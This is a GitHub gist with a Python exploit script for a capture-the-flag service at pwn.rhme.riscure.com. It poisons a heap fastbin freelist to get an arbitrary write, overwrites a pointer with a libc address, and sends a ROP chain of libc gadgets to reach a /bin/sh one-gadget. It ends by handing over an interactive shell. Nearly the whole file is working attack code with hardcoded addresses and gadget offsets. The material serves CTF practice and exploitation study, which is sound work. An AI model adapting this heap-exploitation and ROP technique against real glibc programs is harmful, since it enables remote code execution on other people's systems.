Created
August 29, 2017 01:10
-
-
Save deanjerkovich/118d3a69467c11cb9b594373f7674bbc to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import socket | |
| import time | |
| import telnetlib | |
| import struct | |
| LIBC_BASE = 0x7eff13bcb000 | |
| HEAP_BASE = 0x248b000 | |
| SLEEP_TIME = 1 | |
| t = telnetlib.Telnet() | |
| s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
| s.connect(("pwn.rhme.riscure.com",1337)) | |
| #s.connect(("127.0.0.1",1337)) | |
| def doRecv(): | |
| print "<< ", s.recv(1024) | |
| time.sleep(SLEEP_TIME) | |
| def doSend(data): | |
| print ">> ", data | |
| s.send(data + "\n") | |
| time.sleep(SLEEP_TIME) | |
| doRecv() | |
| blahfuck = raw_input('attach debugger and press enter..') | |
| doRecv() | |
| doSend("1") # add our fake chunk player | |
| doSend("fake") | |
| doSend("33") | |
| doSend("0") | |
| doSend("33") | |
| doSend("0") | |
| doSend("1") | |
| doSend("hax") # add a player | |
| doSend("1") | |
| doSend("1") | |
| doSend("1") | |
| doSend("1") | |
| doSend("3") # get a pointer to it | |
| doSend("1") | |
| doSend("2") # free underlying data | |
| doSend("1") | |
| doSend("4") | |
| doSend("1") | |
| # the below is a heap offset | this is 0x1620 offset from heap base. | |
| # heap base == 0x1a34000 | |
| # offset: 0x1620 | |
| # == 0x1a35620 | |
| doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk | |
| doSend("0") | |
| doSend("1") | |
| doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist | |
| doSend("3") # so our poisoned malloc is in response to the Name malloc | |
| doSend("3") | |
| doSend("3") | |
| doSend("3") | |
| doSend("1") | |
| doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will | |
| doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of | |
| doSend("4") # of our choosing | |
| doSend("4") | |
| doSend("4") | |
| doSend("3") | |
| doSend("0") | |
| doSend("4") | |
| doSend("1") | |
| doSend(struct.pack('<Q', LIBC_BASE + 0x101f80)) | |
| doSend("1") | |
| g1 = struct.pack('<Q', LIBC_BASE + 0x34a70) | |
| g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78) | |
| g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3) | |
| s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n") | |
| t.sock = s | |
| t.interact() | |
| # /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null | libc offset 0xcd0f3 | |
| # /bin/sh 0x7f503050d6c0 | |
| # 0x7f5030436b7b 0x1fb7b xor eax eax, ret | |
| # 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret | |
| # 0x7f5030436b78 0x1fb78 pop r12, ret |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment